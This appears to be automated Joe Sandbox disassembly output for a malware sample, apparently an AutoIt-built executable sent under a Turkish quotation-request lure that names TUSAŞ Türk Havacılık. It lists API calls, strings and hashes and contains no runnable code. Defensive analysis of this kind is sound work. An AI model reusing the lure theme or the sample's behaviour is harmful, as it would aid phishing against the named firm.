                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                    • API String ID: 946324512-2422070025
                                                                                                                                    • Opcode ID: b69a29a53c44f1f36f160c867475ec470d4f03d9f4a88be88a8cc7f8aa4083c1
                                                                                                                                    • Instruction ID: c0cf71c2d219f9f17fc8c6faaa51751e197d99d3fdd4319c1aa9dc7f40ed107c
                                                                                                                                    • Opcode Fuzzy Hash: b69a29a53c44f1f36f160c867475ec470d4f03d9f4a88be88a8cc7f8aa4083c1
                                                                                                                                    • Instruction Fuzzy Hash: DE31C4392103069FCB10CF28C485EAAB7E9EF55318F258059E8158B3D3DB72DE55CB60
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00214705
                                                                                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00214713
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0021471A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    • API String ID: 4014797782-2298589950
                                                                                                                                    • Opcode ID: 5a3c707e1d7bd1c482e246b77e9d0bb2a86b20f590b7fe69f90f7e9db58cd27b
                                                                                                                                    • Instruction ID: 84d2107ec18b2bd02335d823b73239a89724156778ca5924e3bc877b75f51bd1
                                                                                                                                    • Opcode Fuzzy Hash: 5a3c707e1d7bd1c482e246b77e9d0bb2a86b20f590b7fe69f90f7e9db58cd27b
                                                                                                                                    • Instruction Fuzzy Hash: 262190B5610209AFDB10EF64ECC5DA737EDEF6A794B100049FA049B291CB70EC62CB60
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen
                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                    • API String ID: 176396367-2734436370
                                                                                                                                    • Opcode ID: 4cf1d8f214c5b21d30dd5039a746e58a512a1eeab8634c763a5a900e8ccf9733
                                                                                                                                    • Instruction ID: a4d6cb5c41738e87563e938f653d2a69fe1554131d2a0cf2cd4dbbb578ead35d
                                                                                                                                    • Opcode Fuzzy Hash: 4cf1d8f214c5b21d30dd5039a746e58a512a1eeab8634c763a5a900e8ccf9733
                                                                                                                                    • Instruction Fuzzy Hash: F1215E7220499066D735BB269C02FBF73D89F7A314F204427F95997081EB51DE92C3D5
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00213840
                                                                                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00213850
                                                                                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00213876
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: f08762a705b1311a31681bea1093138c9d868d579d8bea67ab18899fd1358a18
                                                                                                                                    • Instruction ID: 48a3c5f3893a2a2421af07584003976477e59fa22d5e40b0d77b28982ccc50a2
                                                                                                                                    • Opcode Fuzzy Hash: f08762a705b1311a31681bea1093138c9d868d579d8bea67ab18899fd1358a18
                                                                                                                                    • Instruction Fuzzy Hash: 3D21A1726202197BEF11CF54DC45EEB77AFEF99750F118124F9049B190C6719CA28B90
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001F4A08
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001F4A5C
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,0021CC08), ref: 001F4AD0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                    • String ID: %lu
                                                                                                                                    • API String ID: 2507767853-685833217
                                                                                                                                    • Opcode ID: 7313604977fba54232c760f119e415f40cc5e9c0e0cf8dff4442cccb7706432d
                                                                                                                                    • Instruction ID: d2c497112011af128272ca9faee7433d0b58b9defeb24d2d1d5d286cbf200395
                                                                                                                                    • Opcode Fuzzy Hash: 7313604977fba54232c760f119e415f40cc5e9c0e0cf8dff4442cccb7706432d
                                                                                                                                    • Instruction Fuzzy Hash: BB315175A40109AFDB10DF54C885EAA7BF8EF19308F1480A9F909DB252DB71EE45CBA1
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0021424F
                                                                                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00214264
                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00214271
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                    • Opcode ID: 0ceb41d19220c56c3f2038c7dee8a53a543423bfad8ce0374126880057016f1a
                                                                                                                                    • Instruction ID: 290675b82310f680618d658efe9b66342022ac60e0f3f28bafe1386d68df0cf2
                                                                                                                                    • Opcode Fuzzy Hash: 0ceb41d19220c56c3f2038c7dee8a53a543423bfad8ce0374126880057016f1a
                                                                                                                                    • Instruction Fuzzy Hash: C6110631250249BEEF206F28CC06FEB3BECEFA5B54F110124FA59E2090D671DCA19B10
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                      • Part of subcall function 001E2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 001E2DC5
                                                                                                                                      • Part of subcall function 001E2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E2DD6
                                                                                                                                      • Part of subcall function 001E2DA7: GetCurrentThreadId.KERNEL32 ref: 001E2DDD
                                                                                                                                      • Part of subcall function 001E2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001E2DE4
                                                                                                                                    • GetFocus.USER32 ref: 001E2F78
                                                                                                                                      • Part of subcall function 001E2DEE: GetParent.USER32(00000000), ref: 001E2DF9
                                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 001E2FC3
                                                                                                                                    • EnumChildWindows.USER32(?,001E303B), ref: 001E2FEB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                    • String ID: %s%d
                                                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                                                    • Opcode ID: 00b2c105c0eea7b00d6fb326852287a2d0d07b28f9db24fb6a0eb32a1c39b1a7
                                                                                                                                    • Instruction ID: 7b1ac285dd331726b025e40e83eeb751da1e1155092d6d1ca86aa9e5b74cc12c
                                                                                                                                    • Opcode Fuzzy Hash: 00b2c105c0eea7b00d6fb326852287a2d0d07b28f9db24fb6a0eb32a1c39b1a7
                                                                                                                                    • Instruction Fuzzy Hash: 0211E1B57002456BCF047FB19C99EEE376EAFA4314F048075FA199B292DF309A498B60
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002158C1
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 002158EE
                                                                                                                                    • DrawMenuBar.USER32(?), ref: 002158FD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                                                    • Opcode ID: a684ce33c87da475f93730278ff6c48ad5a3f4f4e9258a8a31140692ede7ffa7
                                                                                                                                    • Instruction ID: 85fce72586280e7396a94891eaf95a43d9eced80a2e9f2f7c603a2116f3ab462
                                                                                                                                    • Opcode Fuzzy Hash: a684ce33c87da475f93730278ff6c48ad5a3f4f4e9258a8a31140692ede7ffa7
                                                                                                                                    • Instruction Fuzzy Hash: 61015B35510228EFDB219F11EC48BEEBBB9FF95360F208099E849D6151DB708A94DF61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 894fbd5c5bc3062cc588a9cdda582494a851f29a57a6d636615b0c4c6dd57c1a
                                                                                                                                    • Instruction ID: 1d053d54434a5fac0721194ad27a6c7f4737158a4503581f01dd46c449ebdad4
                                                                                                                                    • Opcode Fuzzy Hash: 894fbd5c5bc3062cc588a9cdda582494a851f29a57a6d636615b0c4c6dd57c1a
                                                                                                                                    • Instruction Fuzzy Hash: 96C17C75A00646EFCB15CFA5C898EAEB7B5FF48304F218598E505EB251C771EE81CB90
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1998397398-0
                                                                                                                                    • Opcode ID: 8460717a76985448f6605aff26c4b52d2cf71f3c5f1d1db3e2ada18cd63d6eb1
                                                                                                                                    • Instruction ID: a31309442f83fa63791bff7a08dc24e63f17d3fff63dd843dd6e123e99ce780e
                                                                                                                                    • Opcode Fuzzy Hash: 8460717a76985448f6605aff26c4b52d2cf71f3c5f1d1db3e2ada18cd63d6eb1
                                                                                                                                    • Instruction Fuzzy Hash: 86A14C756147019FC700EF28C485A2ABBE9FF98714F148859F9899B3A2DB31EE01CF91
                                                                                                                                    APIs
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E05F0
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E0608
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0021CC40,000000FF,?,00000000,00000800,00000000,?,0021FC08,?), ref: 001E062D
                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 001E064E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 314563124-0
                                                                                                                                    • Opcode ID: 686d288262e1dbe27582bff14f0c3a8097dd1a6600d6fa8d59d7b13cece50e72
                                                                                                                                    • Instruction ID: 3b003adfd830b4aaf01b7fa977a69f979f09066c170d364344939474f6ef3f6b
                                                                                                                                    • Opcode Fuzzy Hash: 686d288262e1dbe27582bff14f0c3a8097dd1a6600d6fa8d59d7b13cece50e72
                                                                                                                                    • Instruction Fuzzy Hash: 04814975A00609EFCB05DF94C988EEEB7B9FF89315F204158E506AB250DB71AE46CF60
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                    • Opcode ID: 2da0a3d659b4cfda5586796b6c747cacddf69574ee4e2148415c7bfd8251e00a
                                                                                                                                    • Instruction ID: 8a5d46db44a1a387a5d35b03a1e6ccce4877815901ef7f927bdd4c53255f50f4
                                                                                                                                    • Opcode Fuzzy Hash: 2da0a3d659b4cfda5586796b6c747cacddf69574ee4e2148415c7bfd8251e00a
                                                                                                                                    • Instruction Fuzzy Hash: 2A413A35980500BBDB296BF99C46FBE3AA5EF73370F24466DF419D2293E734C8425261
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(0171E7D0,?), ref: 002162E2
                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00216315
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00216382
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3880355969-0
                                                                                                                                    • Opcode ID: 694ffa069282980bf93ec604c053672d6af283e0b919452dfcca9752ad0efcb2
                                                                                                                                    • Instruction ID: acb391de7722d22080a6fd281f1cf26cec0701177adc439b9baae35fa7a3c4ba
                                                                                                                                    • Opcode Fuzzy Hash: 694ffa069282980bf93ec604c053672d6af283e0b919452dfcca9752ad0efcb2
                                                                                                                                    • Instruction Fuzzy Hash: 5D513C74A1020AAFCB14DF54D888AEE7BF5EF65760F208199F82597290D770EDA1CB50
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00201AFD
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201B0B
                                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00201B8A
                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00201B94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$socket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1881357543-0
                                                                                                                                    • Opcode ID: b440b2e3aaea06d23ccadae8bcd2f3fd37c01847a16828c2e9094102e0b33f39
                                                                                                                                    • Instruction ID: 94a12abc1d40389d3b3472177d108db5a6b530b7c3b4953587e08b3ad66ced5d
                                                                                                                                    • Opcode Fuzzy Hash: b440b2e3aaea06d23ccadae8bcd2f3fd37c01847a16828c2e9094102e0b33f39
                                                                                                                                    • Instruction Fuzzy Hash: D641B034640300AFE720AF24D88AF2977E5AB54718F548488FA1A9F7D3D772DD528B90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cc9c65cdf04e54399cc17d791a19767e8132870c44c2a297e182f4e1279d4e6b
                                                                                                                                    • Instruction ID: 7d30fca46fd0aba15cab37c011c523381e55ecc2db23b315b116c6c3715c46c1
                                                                                                                                    • Opcode Fuzzy Hash: cc9c65cdf04e54399cc17d791a19767e8132870c44c2a297e182f4e1279d4e6b
                                                                                                                                    • Instruction Fuzzy Hash: E0412976A04704BFD724AF78CC81BEABBE9EB99710F10452EF142DB682D7B1D9018780
                                                                                                                                    APIs
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001F5783
                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001F57A9
                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001F57CE
                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001F57FA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
